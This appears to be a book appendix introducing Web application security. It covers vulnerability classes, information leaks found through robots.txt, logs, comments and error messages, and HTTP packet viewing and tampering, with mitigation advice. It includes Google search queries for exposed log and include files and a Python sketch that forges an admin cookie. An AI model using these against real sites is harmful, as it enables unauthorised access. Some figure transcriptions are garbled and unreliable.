There is no doubt that the advent of the Internet (more specifically, the World Wide Web) has sparked a revolution in how we share information as families, businesses, and world citizens. Perhaps the most important technological invention since the printing press, this single communication medium holds tomes of information on practically any subject, although that itself is its largest weakness. There are now over 54 million sites on the Web1, and search engines are critical to users for finding valuable information on these sites.
Simple Nomad first documented search engine hacking in late 1997 and published a series of papers on how to use his favorite search engine of the time (AltaVista). Although the search engines used have changed, using them to find vulnerabilities in Web sites is still a novel approach, for "Google crawls all"—both the good and the bad. If you can form a query for a particular vulnerability, the chances are that Google can find it. With a little understanding of Web application security, however, you will realize that vulnerabilities in sites go beyond even what can be discovered with a search engine. In this appendix we discuss the basics of these vulnerabilities.
Defining Web Application Security
Web application security (a term often abbreviated to Web app sec) deals with the overall Web application architecture, logic, coding, and content of the Web application. In other words, Web application security isn't about operating system vulnerabilities or the security defects in your commercial products; it's about the vulnerabilities in your own software. As such, it isn't a replacement for existing security practices but rather complements them. Hopefully after reading this chapter you'll have a clear understanding of some Web application vulnerabilities and how the discipline of Web application security is clearly differentiated from what most people typically consider as Web site security. It can help to understand Web app sec by first understanding what it isn't, since the terms Web and application are used broadly in various areas of Internet security. Web application security is not about the following:
■ Trojans or viruses Firewall manufacturers that have learned how to deal with these often describe their products as providing "application security." Although these products do indeed deal with issues at an application level, they're simply talking about the application level of the OSI stack, not your Web application. The difference is quite distinct in reality, although it has been heavily blurred in the marketing. There are very few actual Web application firewalls on the market, and they are all quite specialized devices; if the same firewall vendor you've been using for years claims to have an application firewall, dig into the details and ensure that the vendor is actually talking about Web application security and not malware and other application-level attacks.
■ Dealing with Spam That's a whole different can of worms (the worms, of course, being the spammers). It's true that spam occurs at the application layer, but again we're talking about something completely different. The focus of Web application security is not protecting your end users from something traveling over the network; it's about protecting your Web site from being hacked.
■ Web filtering This area is really more concerned with watching outbound Web traffic to make sure an employee isn't checking on his fantasy football league at work.
■ Known vulnerabilities in the operating system or Web server Although these vulnerabilities certainly are extremely important and must be addressed, it's a fairly mature space that is well understood. In fact, it is so well understood that one could argue that it put "blinders" on the industry, allowing Web application vulnerabilities to grow and grow with little mitigation until only recently.
The Uniqueness of Web Application Security
The differences between Web application vulnerabilities and known/server vulnerabilities deserve further discussion. When people talk about vulnerabilities (and vulnerability assessments in particular), the majority of the industry deals with "known vulnerabilities" that homogeneously affect every install of the particular version of the affected software. This allows for several luxuries in dealing with these types of vulnerabilities:
■ When a vulnerability is announced, everyone becomes aware of the vulnerability at the same time. Not all vulnerabilities that are discovered are announced, however.
■ Everyone is affected by the vulnerability in the same manner, allowing for a single solution to be applied, usually a software patch from the software manufacturer.
■ Since the vulnerability is identical across the board, a single "signature" of it can be created and applied to any number of scanners, firewalls, or intrusion detection devices.
In contrast to these network or OS vulnerabilities, most Web application vulnerabilities aren't "known" vulnerabilities. Since they exist in the Web application, which is almost always custom written, they are unique to that application. Of course, the technique or methodology might be well known (as SQL injection is well known), but not every Web application will be vulnerable to a certain technique, and even the ones that are will be vulnerable in unique areas in different ways.
This has a real impact on how you deal with Web app vulnerabilities; since they're your own custom-built vulnerabilities, you have to deal with them yourself. This means:
■ You won't receive a vulnerability announcement about them.
■ You won't find them indexed in tomes such as Mitre's CVE database or the SANS Top 20 list.
■ These vulnerabilities can exist on any platform (combination of OS and Web server) and can exist regardless of the security of the platform itself.
■ You won't be able to rely on a vendor patch. Again, this is your software, not COTS, so there is absolutely no leveraging the homogeneous environment.
The exceptions to these rules are "off-the-shelf" Web applications such as PHPNuke, DotNetNuke, or any number of COTS Web software packages. When you're using a "canned" Web application, the benefit of a homogeneous environment does exist. Of course, the second these applications are modified in the least, they become custom software, and they're almost always modified to some extent.
Web Application Vulnerabilities
Remedying Web application vulnerabilities is not particularly difficult. The challenge instead is that of awareness and testing. The channels through which developers are taught and trained conspicuously lack security awareness, and developers are often taught standard techniques that yield insecure code. It is important to point out as well that the majority of Web applications have not been adequately tested for security, if tested at all. The majority of testing on applications is geared toward functionality and performance, which also means that most developers tend to code to those two standards. Only in the last few years have comprehensive scanning solutions been available for testing Web application security. Aside from those few scanners, most of the tools available are either for manual testing or automated for only a tiny portion of what must be tested. This means that most security testing has relied on either penetration testing or code reviews, both of which require significant expertise and are rarely conducted as frequently as necessary to ensure the ongoing security of the application.
Regardless of the reasons, Web application vulnerabilities abound, and this risk is just now being realized. Compared to many forms of hacking, Web application hacking is an extraordinarily easy discipline. Many people who have no clue how to exploit the numerous buffer overflows that are being constantly discovered can skillfully identify and exploit Web app vulnerabilities. Obviously, as this security space matures, the hacking will become less fruitful, but the fact of the matter is that Web hackers have a number of advantages:
■ Web app vulnerabilities get their own rule on the firewall: "Allow HTTP and HTTPS from any source." In fact, in most firewalls, it's probably the very first rule.2
■ This is a difficult area to effectively and properly monitor with an intrusion detection system. As such, it is rarely monitored properly, if at all.
■ Few tools are required. Many vulnerabilities can be discovered and exploited right from a browser. Those that can't simply require a minimal tool set—typically just a proxy that exposes the raw HTTP packet.
■ Web application vulnerabilities are so easy to discover that people can actually find "opportunity hacks" with a search engine, although we'll discuss the limitations of this approach as it pertains to actual Web application assessments.
As a result, Web applications can be exploited left and right. When you really think about it, this shouldn't come as a surprise. After all, if multibillion-dollar software companies have trouble securing their software, why wouldn't smaller, lesser trained shops with significantly less access to resources have the same problems? The answer, of course, is that their software (the Web applications) is just as insecure; these companies just don't realize it.
Web application vulnerabilities exist in many areas, and understanding those areas is critical to understanding Web app sec. The Top 10 Web Application Vulnerabilities list by the Open Web Application Security Project (www.owasp.org) is perhaps the oldest and most established list of Web application vulnerabilities. It's often cited in papers and Web sites and is a great place to start learning the various types of Web application threats. However, it's not an attempt to enumerate and classify all possible vulnerabilities; it's a running list of what the project members perceive to be the most important Web application threats at the time of writing, much as is the SANS Top 20 list.
There are documents that attempt to classify the full realm of Web application threats. The OASIS WAS Vulnerability Types and Vulnerability Ranking Model does an excellent job of organizing vulnerability types into a model that is particularly useful for referencing very specific issues. Likewise, the Web Application Security Consortium (http://www.webappsec.org) published its Threat Classification paper as an organizational model as well. Read both papers, as well as other sources, to learn the sum total of Web application threats out there. (Some resources are listed at the end of this chapter.) Here is a sample of some general types of Web application vulnerabilities:
■ Authentication issues These refer to things such as login mechanisms, preventing password theft through mechanisms such as "Lost Password" features, and ensuring that all "secure" content actually requires authentication. This area has received a lot of attention over the years, and some fairly standard practices have evolved, though they are often debated.
■ Session management This is a very important area, dealing with problems such as preventing session spoofing by predicting credentials (i.e., session IDs) and ensuring that application features that require higher access properly check the authorization level of the user. Several recent publicized hacks were the result of weak session management.
■ Command injection These are the result of the application accepting input from the browser (whether it's input that the user typed in or input that the programmer passed from a previous page) that allows the attacker to insert commands and execute them. These commands can range from database queries (such as in the case of SQL injection) to JavaScript (as in cross-site scripting) or even actual system commands. The impact of these is often devastating. Note that command execution is not limited to system commands; even just the ability to insert HTML into a page could be used to hack successfully.
■ Information disclosure There are lots of clues in Web sites that help a hacker, from HTML comments to finding complete software manuals on the system (yes, this happens all the time). Although any single incident of information disclosure by itself is rarely useful for a complete hack, these incidents often have a damaging cumulative effect.
Note that this is by no means a complete list of all possible Web application vulnerabilities; it is merely a start. Web applications have the potential to be infinitely complex, and so do their vulnerabilities; be sure to read the papers mentioned in this chapter to learn more about the full scope of vulnerabilities and threats.
For the purposes of this appendix, we'll abstract the issues even higher, relating them to the content and code of the site. What we're labeling as "content issues" are those vulnerabilities that appear in the actual page itself; they are "standalone" vulnerabilities that don't require any real understanding of how the application works. In contrast, "code" issues exist in the server-side code for the page and require actually exercising the logic for that page to see what you can get away with in it. You can use search engines to find symptoms of code-related errors: for instance, certain ODBC errors can be indicative of SQL injection, but to truly determine if the vulnerability does indeed exist (and the extent of it), you have to make follow-on requests with specially formed packets to test it.
Even with strictly content issues, a search engine will not expose the full gamut of issues. Search engines crawl and index by very specific rules to ensure that they "play nicely" with Web sites, and this limits the amount of content you can find through them.
Constraints of Search-Engine Hacking
This book has already given a very good picture of exactly what can be found just in the content. But it's important to also understand the constraints of search engine hacking. Certainly using a search engine will find targets of opportunity, but when you're talking about actually doing a concerted test on a target system, you need to understand that anything you turn up using a search engine is just the tip of the iceberg. To put this in graphical terms, Figure B.1 displays the subset of vulnerabilities that are exposed to Google.
Figure B.1 Only a Subset of Vulnerabilities Is Exposed to Google
First, not all sites are crawled by Google. That's hard to believe, but remember that for every public Web application any sizable company has (and has submitted to Google to crawl), many others are either not on the Web at all or are not public Web sites. These could include the strictly internal Web applications within a company or extranets that are external facing but meant for an extremely limited audience.
Even of the sites Google does crawl, not all of each site will be crawled. Google can only follow linked pages, and it doesn't do any guessing at filenames or follow clues to other files. Not even all linked files are followed; certainly those linked with HTML links are, but JavaScript links might not necessarily be followed, and pages that can only be found via a form submission won't be found at all. Additionally, Google politely respects requests not to crawl certain areas, as indicated in the robots.txt file.
All this means that although lots of serious information can be garnered using search engines, this form of hacking is by no means the complete picture of Web application security. In fact, even just in the realm of content there's a lot of information (and vulnerabilities) that a human can find but a search engine would probably miss.
Information and Vulnerabilities in Content
The first thing to realize about content is that it takes many forms. A typical Web page will obviously contain HTML that is rendered in the browser, but additional information in the page source can be valuable to a hacker or penetration tester. JavaScript, comments, and hidden form fields all yield clues and can even be manipulated to actively test the application. Page-scraping techniques, such as those covered throughout this book, can be used to extend the results of a search to get to this type of data.
However, beyond the page source, a great deal of information is available in the raw HTTP itself: status codes, headers, and post data are all valuable areas that are not exposed in the browser. Typically, a crawl is the starting point to discover as much of the site as possible. Additional work will almost always yield more content to scrutinize; this could be a dictionary attack that simply requests a list of files, or it could involve manually poking around and requesting files. More often than not, it's a combination of the two. Although actual vulnerabilities can be discovered in content, for the most part the biggest value comes in information disclosures.
The Fast Road to Directory Enumerations
Some files save a hacker a lot of reconnaissance work by giving him or her a complete list of additional content to analyze. Some of the most obvious files that yield lots of good directory and/or filenames are the robots.txt file, FTP logs, and Web traffic reports, although obviously others can exist as well. These techniques are all covered in detail throughout this book, but we present them in brief here, firmly placed within the context of a Web application assessment.
Robots.txt
Robots.txt is a plaintext file that tells search engines where they can and can't crawl. This file is always plaintext and is always stored in the root of the Web site, that is, at /robots.txt directly under the site's hostname. For this reason, it's a great way to start off your searching. Of course, even more can be unearthed by examining the raw packets.
Robots.txt is a simple file: It specifies a user agent and directories that are either explicitly allowed or disallowed. It is very useful for quickly identifying interesting areas of the application because if a search engine is explicitly told not to search a certain directory, a hacker would certainly want to know why. Take, for example, Figure B.2, in which we see the robots.txt file from Google.com. There are several interesting directory names that search engines have been told not to crawl, one of which is the /catalogs directory. By manually browsing google.com/catalogs, you'll see that this is a beta application that might not have been otherwise detected.
Of course, the robots.txt file has to be manually created, meaning that the system designers should be well aware of the fact that they're advertising those directory names. However, the search results are far more interesting to the hacker when the designers and administrators are not aware of certain directories he or she has located.
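As a rough illustration of how quickly a robots.txt file gives up its directory names, the following minimal sketch pulls out every Disallow entry. The function name disallowed_paths and the sample file content are hypothetical (only /catalogs echoes the example discussed above), and the parsing is deliberately simplified: it ignores which user agent each rule applies to.

```python
def disallowed_paths(robots_txt: str) -> list[str]:
    """Return the Disallow paths found in robots.txt content, in file order."""
    paths = []
    for raw_line in robots_txt.splitlines():
        # Drop trailing comments and surrounding whitespace.
        line = raw_line.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        field, value = line.split(":", 1)
        value = value.strip()
        # An empty Disallow value means nothing is disallowed, so skip it.
        if field.strip().lower() == "disallow" and value:
            paths.append(value)
    return paths


# Hypothetical robots.txt content, not copied from any real site.
sample = """\
User-agent: *
Disallow: /search
Disallow: /catalogs   # beta area
Allow: /about
Disallow:
"""

print(disallowed_paths(sample))
```

An administrator can run the same kind of check against his or her own site to see exactly which directory names are being advertised.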
FTP Log Files
Log files are also an incredible source of additional directories and filenames to check, as we've seen throughout this book, especially in Chapter 10. Frequently these are FTP log files, although any type of logging or trace file that's viewable to the public is a liability. FTP logs in particular give the hacker that many more files to look for and can also reveal such things as the system name, client IP address, or even the internal IP address of the system. Think about who FTPs to a Web server: most likely someone with privileges, and if that IP traces back to a residential line, an alternative target comes to light: a system that will probably be considerably less defended but has plenty of access to the Web site.
Never allow log files of any type to gather on a server in the Webroot, because they won't attract dust. Figure B.3 shows a quick Google search for a very common FTP log filename. Some of these files were intentionally placed by the administrators, but surely most were not.
Figure B.3 Google Search Results for a Common FTP Log File
Results 1 - 10 of about 255,000 for allinurl:"ws_ftp.log" (0.73 seconds)
Web Traffic Reports
Web traffic reports, explored in Chapter 10, are also a highly valuable source of information to the hacker. These are reports generated by specialized software that analyzes the Web traffic logs to generate easily digestible information about the Web traffic. In particular, most reports show not only the most popular pages but the least popular as well. This almost always presents some interesting areas to be explored. Think contrarian here; if you have a public Web site that takes hundreds of thousands of hits a day, but some pages only take several hundred hits a day, what function do you think those pages play within the Web application? They could be a remote Web-based admin section or perhaps a separate section for customer service representatives to log into and access higher functionality. Either way, chances are they'll be a good source of information, and in some cases, extreme vulnerabilities can be found in these stats.
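The "think contrarian" idea can be sketched in a few lines: count hits per page and look at the bottom of the list instead of the top. This is only an illustration; the function name least_requested and the request paths are hypothetical, and a real traffic report would be built from actual server log entries.

```python
from collections import Counter


def least_requested(paths, n=3):
    """Return the n least-requested paths as (path, hits), fewest hits first."""
    counts = Counter(paths)
    # Sort by hit count, then by path so that ties come out in a stable order.
    return sorted(counts.items(), key=lambda item: (item[1], item[0]))[:n]


# Hypothetical request paths, as they might be pulled from a Web server log.
requests = (
    ["/index.html"] * 500
    + ["/products.html"] * 300
    + ["/admin/login.asp"] * 2
    + ["/csr/tools.asp"] * 5
)

print(least_requested(requests, n=2))
```

In this made-up data the two quietest pages are exactly the kind of admin and customer service areas described above.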
HTML Comments
HTML comments are also a great source of information, not just for finding more content but about the system itself and more. Many developers are still leaving "TMI"—too much information—in their client-side comments. For example, some commonly seen ones include:
■ Directory names or filenames
■ References to server-side code
■ Documenting template pages
■ References to installed applications or systems
■ Revision history
■ Internal names or contact information (many companies use the same naming conventions for their logins as they do their e-mail)
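To review what a page's comments give away, the comments can be pulled out of the source mechanically. The sketch below uses the HTMLParser class from Python's standard library; the class name CommentCollector, the helper extract_comments, and the sample page are all hypothetical.

```python
from html.parser import HTMLParser


class CommentCollector(HTMLParser):
    """Collect the text of every HTML comment fed to the parser."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        # data is the text between "<!--" and "-->".
        self.comments.append(data.strip())


def extract_comments(html: str) -> list[str]:
    collector = CommentCollector()
    collector.feed(html)
    collector.close()
    return collector.comments


# Hypothetical page source showing the kind of "TMI" described above.
page = """<html><body>
<!-- template: /includes/header.inc -->
<p>Welcome</p>
<!-- TODO jsmith: remove test login before release -->
</body></html>"""

for comment in extract_comments(page):
    print(comment)
```

Running something like this over your own pages before release is a cheap way to spot filenames, internal names, and notes that should never reach the browser.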
Error Messages
Error messages are another phenomenal source of information, as we've seen throughout this book, highlighted in Chapters 8 and 10. They're all over the Web and often overlooked by untrained eyes. Every error message tells a story, and they're flashing neon signs that say "my site is broken." Hackers will almost always stop to see exactly how broken. These messages can also reveal large amounts of sensitive information such as file system paths, additional content, internal code, and more. Most extremely useful error messages are generated with active testing (tampering with the application), but many can be found with a crawl as well. In Figure B.4, an error message reveals the file system path, along with information about the server-side code.
Figure B.4 Error Message Revealing the Web Root and Other Details
#cookie.contactid# I Error near line 27, column 21.
Error resolving parameter COOKIE.CONTACTID
The cookie value CONTACTID was not found in the current template file. The cause of this error is very likely one of the following things:
1. The name of the cookie variable has been misspelled.
2. The cookie variable has not yet been created or has timed out.
To set default values for cookie variables you should use the CFPARAM tag (e.g. )
The error occurred while processing an element with a general identifier of (#cookie.contactid#), occupying document position (27:20) to (27:37) in the template file D:yNETPUB\WWWROO"nDISPLAY\.ASITES\1 203Uu\MEMBERSLISTING.CFM.
Sample Files
Sample files or other commonly used applications such as those revealed in Chapter 8 typically have well-documented vulnerabilities in them. Many sample files are actually remote tools for the developers, and others might simply demonstrate the system's features.
Bad Extensions
Another common mistake that can have devastating consequences is simply misnaming a file extension, as we explored in Chapter 3. Extensions are mapped in the Web server, and this is how the server knows a page is supposed to be executed on the server as opposed to simply sent to the browser. Any page that contains server-side code requires an extension that the server will recognize and execute.
Figure B.5 shows the application mappings for Internet Information Server; here it is clear that the Web server relies on proper extensions to understand how to process a file.
With the wrong extension, the server will simply send the text file to the browser, completely revealing the server-side source code. Unfortunately, many developers have actually been trained to give their files nonexecutable extensions, particularly server-side include files (.inc files). Figure B.6 shows the results of a query asking for a very common filename given to the files that define database connectivity in certain PHP applications. Although the number of hits might sound low, remember that this is only one specific filename, and these all had to be exposed to Google via directory browsing to be indexed. In reality, a huge number of include files with the .inc extension are running in Web applications right now.
Figure B.6 Include Files Are a Common Source of Server-Side Code
Results 1 - 10 of about 147 for intitle:"Index of" "dbconn.inc". (0.35 seconds)
Most dictionary attacks ask for commonly used include files, but this attack isn't limited to include files by any means; any page that contains server-side code that has the wrong extension on it will leak that source code. Likewise, any archive files left on the server (such as tarballs or ZIP files) are subject to download along with their contents, whether HTML or code. Figures B.7 and B.8 show how a copy of a file with an improper extension reveals its source code. Since the extension .bak doesn't correlate with any application mappings, the server doesn't realize that the page is supposed to be executed and performs a "read" operation on it instead, yielding its source code to the lucky viewer. Note that although the examples here show Active Server Pages running on Internet Information Server, this issue is by no means limited to that platform; this page is chosen merely for the sake of demonstration. These issues exist on all platforms, including Java and PHP applications.
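From the defender's side, the same logic can be turned into a simple housekeeping check: list the files in the Webroot and flag any whose extension the server would neither execute nor knowingly serve as static content. The sketch below is only an illustration. Both extension sets are assumptions that must be adjusted to match the real application mappings, and the function name risky_files and the file list are hypothetical.

```python
from pathlib import PurePosixPath

# Assumed extensions that the server is configured to execute.
EXECUTED_EXTENSIONS = {".asp", ".php", ".jsp", ".cfm"}
# Assumed extensions that are intentionally served as static content.
STATIC_EXTENSIONS = {".html", ".htm", ".css", ".js", ".png", ".jpg", ".gif"}


def risky_files(paths):
    """Return paths whose final extension is neither executed nor known static."""
    flagged = []
    for path in paths:
        # Only the last extension counts: "login.asp.bak" ends in ".bak".
        suffix = PurePosixPath(path).suffix.lower()
        if suffix not in EXECUTED_EXTENSIONS and suffix not in STATIC_EXTENSIONS:
            flagged.append(path)
    return flagged


# Hypothetical Webroot listing.
webroot = [
    "/index.asp",
    "/login.asp.bak",
    "/includes/dbconn.inc",
    "/site.zip",
    "/logo.png",
]

print(risky_files(webroot))
```

Anything the check flags (backup copies, include files, archives) is a candidate for deletion or for renaming to an extension that the server executes.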
System Documentation
System documentation of one form or another can also often be found on sites, as we discussed in Chapter 8. This documentation is usually in the form of Readme files but can also be complete online manuals. Although these might be helpful while developing a system, they must not be on anything in production. The same can be said for test files: Remember that these are pages where a developer was testing something, and these pages are usually broken. The error messages gleaned from these pages can be amazingly helpful because they tend to slip under the radar of any administrative housekeeping.
These were just some choice examples of frequently occurring issues. Obviously there's no limit to the amount of junk that collects on a Web server over time; chalk it up to poor housekeeping or just "Internet entropy." When you're fishing for files, use your imagination, but naturally, prioritize items that will help you further the testing.
Defending your site from these content issues is easy once you understand the impact even relatively benign items can have. In general, a few basic practices can help mitigate content-related issues:
■ Ensure that all files have a script extension, even if the page only contains HTML. For example, ASP code in an HTML file will not be executed; it will be displayed to the browser. An .asp file that only contains HTML, however, will still serve the HTML fine.
■ Clean up your Web directories. Ensure that only intended pages are present, and delete anything that doesn't belong, especially sample applications. On most systems it's pretty easy to pick out the files that don't belong. When in doubt, ask the developers.
■ Disallow HTML comments in code. Allow only server-side comments. If the page is only HTML and requires a comment, insert a server-side comment within script delimiters, such as:
Text and stuff
More text and stuff and a <% 'comment %> that won't make it to the browser.
Of course, this works only if you run everything with a script extension.
■ Be aware of what is transmitted in your cookies and post data. Even though these aren't readily viewable in a browser, they are immediately apparent to a hacker, as we'll see later.
Hidden Form Fields, JavaScript, and Other Client-Side Issues
A large number of mechanisms are available to the developer in the client-side code, such as hidden form fields and JavaScript; there are well-known issues with these as well. For example, many developers use hidden form fields for everything from session identifiers to view state controls. None of these are issues if done properly; the fact that a session ID is in a hidden form, for example, doesn't make the identifier itself any more or less secure than if it appeared in the URL.
However, many developers still believe that hidden form fields are actually hidden from the user. Unfortunately, this couldn't be further from the truth. They are called "hidden" because they don't render in the browser view, but they are quite plainly accessible in the HTML source and raw packets. In the late 1990s "client-side pricing" (hidden form fields that actually passed the price of an item from page to page in the shopping cart) was common. By simply saving the HTML to disk and modifying it, a hacker could actually change the price of a product when checking out. Sadly, this exact issue still exists today, although far less often than in the past.
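To make the point concrete, the following minimal sketch lists every hidden field in a page's source, which is all it takes to "unhide" them. It relies on HTMLParser from Python's standard library; the class name HiddenFieldCollector, the helper hidden_fields, and the sample shopping cart form are hypothetical.

```python
from html.parser import HTMLParser


class HiddenFieldCollector(HTMLParser):
    """Record the name and value of each <input type="hidden"> element."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attributes = dict(attrs)
        # The type attribute may be missing, so fall back to an empty string.
        if (attributes.get("type") or "").lower() == "hidden":
            self.fields[attributes.get("name")] = attributes.get("value")


def hidden_fields(html):
    collector = HiddenFieldCollector()
    collector.feed(html)
    collector.close()
    return collector.fields


# Hypothetical form illustrating "client-side pricing."
form = """<form action="/checkout.asp" method="post">
<input type="hidden" name="price" value="49.99">
<input type="hidden" name="item" value="1203">
<input type="text" name="quantity" value="1">
</form>"""

print(hidden_fields(form))
```

Any value that shows up in this output is under the user's control, so the server has to look up or revalidate things like prices instead of trusting what the form sends back.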
The old-fashioned way of manipulating content was to save the Web page to disk, modify the local file, and use it to submit a modified request to the server. This, however, is a terribly mundane way of going about it. It all gets so much easier when you drill down to the packet level. Additionally, a great deal of information is exposed in the packet that simply isn't available without viewing the raw packet. Before getting into any real code attacks, you have to understand how HTTP packets work and how to manipulate them to directly submit tampered data to the Web application.
Playing with Packets
All communication between the browser and server is done via HTTP requests and responses. As an application-level protocol, HTTP is wrapped into lower-level protocols, so you don't need to worry about them. Every time you load a Web page into your browser, the browser makes multiple requests to the server as it downloads images, scripts, and other elements. When you submit a form, the browser submits the data you've entered, along with any hidden form values and any possible effects of JavaScript, to the server in a request, almost always via either a GET or a POST.
An HTTP GET passes information to the server by appending the information to the end of the page name, as shown in Figure B.9. In a POST request, however, the information is not appended to the URL but is rather submitted in the body of the request packet, as shown in Figure B.10. Many developers believe that POST requests are actually more secure than GETs because the information is not exposed in the address bar of the browser. In reality, a POST is just as exposed as a GET in the packet and equally subject to tampering. There is, however, one distinct difference between a GET and a POST: data persistency. Anything in a URL (such as querystring information from a GET) can persist in many areas far beyond the Web developer's control. These include:
■ The browser's history cache
■ The browser's bookmarks
■ Any outbound proxy logs
■ Any inbound proxy logs
■ Any firewall logs
■ Web server logs
■ Web server traffic reports (which read the server logs)
■ Referrer strings, which could actually send the information to a different site
Therefore, it is always a good idea for any Web forms to submit via a POST instead of a GET. This is merely to avoid this issue of the data living everywhere, however, and does absolutely nothing to secure the data.
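The following sketch builds a GET and a POST from the same parameters to show that the data travels in identical form either way; only its position in the packet changes. The helper names build_get and build_post are hypothetical, the Content-Type header is an addition for completeness, and the parameter values are a cleaned-up reading of the ones in Figures B.9 and B.10, which is an assumption.

```python
from urllib.parse import urlencode

# Assumed clean reading of the parameters shown in Figures B.9 and B.10.
params = {"Department": "Mens", "Aisle": "Shirts", "Color": "Blue"}
encoded = urlencode(params)


def build_get(path, host, data):
    """Return a raw GET request with the data appended to the URL."""
    return f"GET {path}?{data} HTTP/1.0\r\nHost: {host}\r\n\r\n"


def build_post(path, host, data):
    """Return a raw POST request with the same data carried in the body."""
    body = data.encode("ascii")
    return (
        f"POST {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{data}"
    )


get_request = build_get("/browse.asp", "www.onlineretailer.com", encoded)
post_request = build_post("/browse.asp", "www.onlineretailer.com", encoded)

print(get_request)
print(post_request)
```

The same encoded string appears in both requests in plain view. Choosing POST keeps it out of URLs, and therefore out of histories, logs, and referrer strings, but it does nothing to hide it from anyone who can see the packet.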
Figure B.9 An HTTP GET Packet
GET /browse.asp?Department=Mens&Aisle=Shirts
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Cookie: Q29uZ3JhdHVsYXRpb25zIC4uLiB5b3UgYXJlIHZlcnkgMTMzNw==
Connection: Close
Figure B.10 An HTTP POST Packet
POST /browse.aspHTTPAI.O Host: www.onlineretailer.com
User-Agent: Mozilla/5.0 [Windows; U; Windows NT 5.0: en-US: rv:1.7) Gecko/20040614 Firefon/0.9 StumbleUpon/l.995 Accept: rewr/wmLapplication/Hrnl.applicarion/Hhrml+wml.reHt/hrrnl;q=0.S.reHr/plain;q=0.8jrnageypng.K/K;q=0.5 Accept-Language: en-us.en;q=0.5 Accept-Encoding: gzip.deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,";q=0.7 Keep-Alive: 300
Cookie: eT N^l G wzM zduM zU 11G Izl G Ny dWM kN G w= Connection: Close Content-Length: 39
Department=Mens&Aisle=SNrts&Color=Eilue
In both a GET and a POST, the information is a concatenated string composed of a parameter name and the value of that parameter. Some fairly standard delimiters are used to help the server interpret the data, as shown in Figure B.11.
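The name/value encoding described above can be explored with Python's standard urllib.parse module. This is only a minimal sketch; it assumes the Department, Aisle, and Color parameters from Figures B.9 and B.10 and shows that the same encoded string can travel either in the URL or in the request body.

```python
from urllib.parse import parse_qs, urlencode

# Parameter names and values taken from the examples in Figures B.9 and B.10.
params = {"Department": "Mens", "Aisle": "Shirts", "Color": "Blue"}

# '=' joins a name to its value and '&' separates one pair from the next.
encoded = urlencode(params)

# In a GET the string follows '?' in the URL; in a POST it is the request body.
get_request_line = f"GET /browse.asp?{encoded} HTTP/1.0"
post_body = encoded.encode("ascii")

# The server reverses the process to recover the individual parameters.
decoded = parse_qs(encoded)

print(get_request_line)
print(len(post_body), decoded)
```

The length of post_body is the value a client would place in the Content-Length header of the POST.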
By intercepting packets from the browser, you can see all form data submitted, including hidden form field values and the effects of any JavaScript that executed.
Not all information is transmitted via queries and post data, however. A Web application developer has full access to all areas of the packet and will often store information in the cookie or even go so far as to create custom headers to store data. All areas of the packet are subject to viewing and tampering, and performing it at packet level is easy and efficient. Figure B.12 shows a raw request with an interesting cookie being sent to the server.
Figure B.12 An HTTP Request Showing a Cookie Transmitted to the Server
GET /test2.asp HTTP/1.0
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040614 Firefox/0.9 StumbleUpon/1.995
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: Close
Cookie: auth=admin%3Dfalse%26authlevel%3D1; ASPSESSIONIDASDSAASB=MAKJPIICIEJNGJMEANEPAHGL
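To see why a cookie like this one is "interesting," it helps to URL-decode it. The following is a rough sketch using Python's standard library; the cookie value is an assumption, transcribed as best it can be read from Figure B.12, and the tampering step simply illustrates that the client controls whatever it sends back.

```python
from urllib.parse import quote, unquote

# Value of the "auth" cookie as read from Figure B.12 (an assumption).
raw_cookie = "admin%3Dfalse%26authlevel%3D1"

# %3D is '=' and %26 is '&', so the cookie hides two name/value pairs.
decoded = unquote(raw_cookie)

# Nothing stops a client from editing the value before sending it back.
tampered = decoded.replace("admin=false", "admin=true")
forged_cookie = quote(tampered, safe="")

print(decoded)
print(forged_cookie)
```

Whether the server honors the forged value depends entirely on whether it trusts client-supplied state, which is the weakness the text describes.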
Viewing and Manipulating Packets
Before you can begin modifying packets, you have to actually get access to them. As we know, the browser will only display the URL (and any accompanying querystring) and the body (the HTML) of the HTTP response. The only portion of an HTTP request that is displayed is the URL and querystring itself; POST data is not viewable in a browser.
There are several ways of viewing the actual raw packets themselves. The first method that comes to mind for most people is packet sniffing, which will indeed show you the full conversation between browser and server. A favored packet sniffer is Ethereal (since renamed Wireshark), pictured in Figure B.13, which displays the packets in an easily read format.
Be prepared, however, to sift through a large number of packets because the server response can actually take place over multiple packets. If you're using Ethereal, be sure to take advantage of its filtering and coloring rules to sort the chaff from the wheat.
At some point, you'll need to actually modify the packets, not just view them, and this takes more than a sniffer. There are a couple of ways of modifying packets, and both are used extensively. For a "one-off" request, simple Telnet will do the trick: Telnet to the server on port 80 (or the appropriate port), type in your packet, and terminate the packet with two carriage returns; the server will respond accordingly. Typing in packets by hand gets old quickly, however, and to perform repetitive tasks you'll want to script out the work.
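Scripting the Telnet approach takes only a few lines. The sketch below is one possible way to do it with Python's socket module; the function names are hypothetical, and it should only be pointed at a server you are authorized to test. Note the blank line (two CRLF pairs) that terminates the headers, the scripted equivalent of the two carriage returns typed by hand.

```python
import socket


def build_request(host: str, path: str = "/") -> bytes:
    """Return a minimal HTTP/1.0 GET request as raw bytes."""
    lines = [
        f"GET {path} HTTP/1.0",
        f"Host: {host}",
        "Connection: close",
    ]
    # A blank line (CRLF CRLF) tells the server the headers are complete.
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def send_request(host: str, port: int = 80, path: str = "/") -> bytes:
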